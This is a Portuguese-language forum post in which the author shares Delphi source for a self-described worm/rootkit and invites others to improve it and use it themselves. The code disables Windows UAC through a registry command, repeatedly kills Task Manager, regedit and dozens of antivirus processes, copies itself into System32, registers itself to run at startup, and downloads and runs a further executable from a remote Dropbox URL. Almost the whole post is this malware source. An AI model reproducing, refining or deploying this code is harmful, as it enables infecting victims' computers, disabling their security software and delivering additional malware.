Durante meus estudos de codigos fontes de worms eu decidi criar um worm/rootkits em delphi. Não fiz em Assembly porque eu não programar o mesmo ainda, porém, eu estou tentando aprender com pesquisas e analises proprias. Esse codigo que vou por a seguir nao coloquei nenhum comentarios por fica bem evidente o que ele faz. Eu ainda não terminei ele, ainda falta varios pontos principalmente o ponto de ser detectavel por antivirus por esta em Delphi. Ele por enquanto apenas finaliza uma serie de processos de antivirus e baixa um outro worm da sua escolha para o computador da vitima, salva no disco "C:\" com o nome de "inCODE.exe", executa e se coloca em autorun no sistema, eu sei que o codigo existe grandes falhas como o "if" no timer, mas estou divulgando caso alguem se interesse e venha a modificar para uso proprio, porém, ja aviso que Não Me responsabilizo por qualquer, dano ou mal que venham fazer desse software
Segue o codigo:
Obs: Quem puder postar uma versão melhorada desta tão vai ajudar não só a mim mas tambem a todos. O codigo esta um pouco precario pois ando sem tempo para conserta e bolar ideias.
Quem quiser copiar, pode copiar desde que coloque os creditos.
Segue o codigo:
Código:
unit inCODE; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Registry, tlhelp32, ExtCtrls,Urlmon, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP; type TForm1 = class(TForm) Timer1: TTimer; IdHTTP1: TIdHTTP; procedure FormCreate(Sender: TObject); procedure Timer1Timer(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} // Desenvolvido por Jefinho // http://www.desvendandomalware.blogspot.com.br/ function DownloadFile(Source, Dest: string): Boolean; begin try Result:= UrlDownloadToFile(nil, PChar(source),PChar(Dest), 0, nil) = 0; except Result:= False; end; end; procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); var sKey : string; reg : TRegIniFile; begin if( bRunOnce )then begin sKey := 'Once' end else begin sKey := ''; end; reg := TRegIniFile.Create( '' ); reg.RootKey := HKEY_LOCAL_MACHINE; reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine ); reg.Free; end; function KillTask(ExeFileName: string): Integer; const PROCESS_TERMINATE = $0001; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin Result := 0; FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); FProcessEntry32.dwSize := SizeOf(FProcessEntry32); ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); while Integer(ContinueLoop) <> 0 do begin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then Result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0)); ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; procedure TForm1.Timer1Timer(Sender: TObject); begin WinExec('C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',SW_shownormal); KillTask('taskmgr.exe'); KillTask('msconfig.exe'); KillTask('regedit.exe'); KillTask('RegCleaner.exe'); KillTask('cmd.exe'); KillTask('mmc.exe'); KillTask('gepedit.msc'); KillTask('avgcc.exe'); KillTask('avgcc.exe'); KillTask('avgamsvr.exe'); KillTask('avgupsvc.exe'); KillTask('avgw.exe'); KillTask('avgcc32.exe'); KillTask('avgctrl.exe'); KillTask('avgserv.exe'); KillTask('avgserv9.exe'); KillTask('avgserv9schedapp.exe'); KillTask('avgw.exe'); KillTask('avgemc.exe'); KillTask('ashwebsv.exe'); KillTask('ashdisp.exe'); KillTask('ashmaisv.exe'); KillTask('ashserv.exe'); KillTask('aswUpdSv.exe'); KillTask('ashwebsv.exe'); KillTask('nod32krn.exe'); KillTask('nod32kui.exe'); KillTask('avcenter.exe'); KillTask('avcmd.exe'); KillTask('avconfig.exe'); KillTask('avguard.exe'); KillTask('avgnt.exe'); KillTask('avnotify.exe'); KillTask('avscan.exe'); KillTask('guardgui.exe'); KillTask('licmgr.exe'); KillTask('sched.exe'); KillTask('preupd.exe'); KillTask('clamscan.exe'); KillTask('clamTray.exe'); KillTask('clamWin.exe'); KillTask('freshclam.exe'); KillTask('oladdin.exe'); KillTask('sigtool.exe'); KillTask('w9xpopen.exe'); KillTask('Wclose.exe'); KillTask('cmgrdian.exe'); KillTask('alogserv.exe'); KillTask('mcshield.exe'); KillTask('vshwin32.exe'); KillTask('avconsol.exe'); KillTask('vsstat.exe'); KillTask('avsynmgr.exe'); KillTask('avadmin.exe'); KillTask('avcenter.exe'); KillTask('avgnt.exe'); KillTask('avguard.exe'); KillTask('avnotify.exe'); KillTask('avscan.exe'); KillTask('guardgui.exe'); end; procedure TForm1.FormCreate(Sender: TObject); begin WinExec('C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',SW_shownormal); KillTask('taskmgr.exe'); KillTask('msconfig.exe'); KillTask('regedit.exe'); KillTask('RegCleaner.exe'); KillTask('cmd.exe'); KillTask('mmc.exe'); KillTask('gepedit.msc'); KillTask('avgcc.exe'); KillTask('avgcc.exe'); KillTask('avgamsvr.exe'); KillTask('avgupsvc.exe'); KillTask('avgw.exe'); KillTask('avgcc32.exe'); KillTask('avgctrl.exe'); KillTask('avgserv.exe'); KillTask('avgserv9.exe'); KillTask('avgserv9schedapp.exe'); KillTask('avgw.exe'); KillTask('avgemc.exe'); KillTask('ashwebsv.exe'); KillTask('ashdisp.exe'); KillTask('ashmaisv.exe'); KillTask('ashserv.exe'); KillTask('aswUpdSv.exe'); KillTask('ashwebsv.exe'); KillTask('nod32krn.exe'); KillTask('nod32kui.exe'); KillTask('avcenter.exe'); KillTask('avcmd.exe'); KillTask('avconfig.exe'); KillTask('avguard.exe'); KillTask('avgnt.exe'); KillTask('avnotify.exe'); KillTask('avscan.exe'); KillTask('guardgui.exe'); KillTask('licmgr.exe'); KillTask('sched.exe'); KillTask('preupd.exe'); KillTask('clamscan.exe'); KillTask('clamTray.exe'); KillTask('clamWin.exe'); KillTask('freshclam.exe'); KillTask('oladdin.exe'); KillTask('sigtool.exe'); KillTask('w9xpopen.exe'); KillTask('Wclose.exe'); KillTask('cmgrdian.exe'); KillTask('alogserv.exe'); KillTask('mcshield.exe'); KillTask('vshwin32.exe'); KillTask('avconsol.exe'); KillTask('vsstat.exe'); KillTask('avsynmgr.exe'); KillTask('avadmin.exe'); KillTask('avcenter.exe'); KillTask('avgnt.exe'); KillTask('avguard.exe'); KillTask('avnotify.exe'); KillTask('avscan.exe'); KillTask('guardgui.exe'); CopyFile(PChar(Application.ExeName),'C:\WINDOWS\System32\inCODE.exe',True); RunOnStartup('inCODE','C:\WINDOWS\System32\inCODE.exe',true); if DownloadFile ('http://dl.dropbox.com/u/75831264/Install.exe','C:\inCODE.exe') then begin winexec('c:\inCODE.exe',sw_normal); end; WinExec('C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',SW_shownormal); end; end.
Quem quiser copiar, pode copiar desde que coloque os creditos.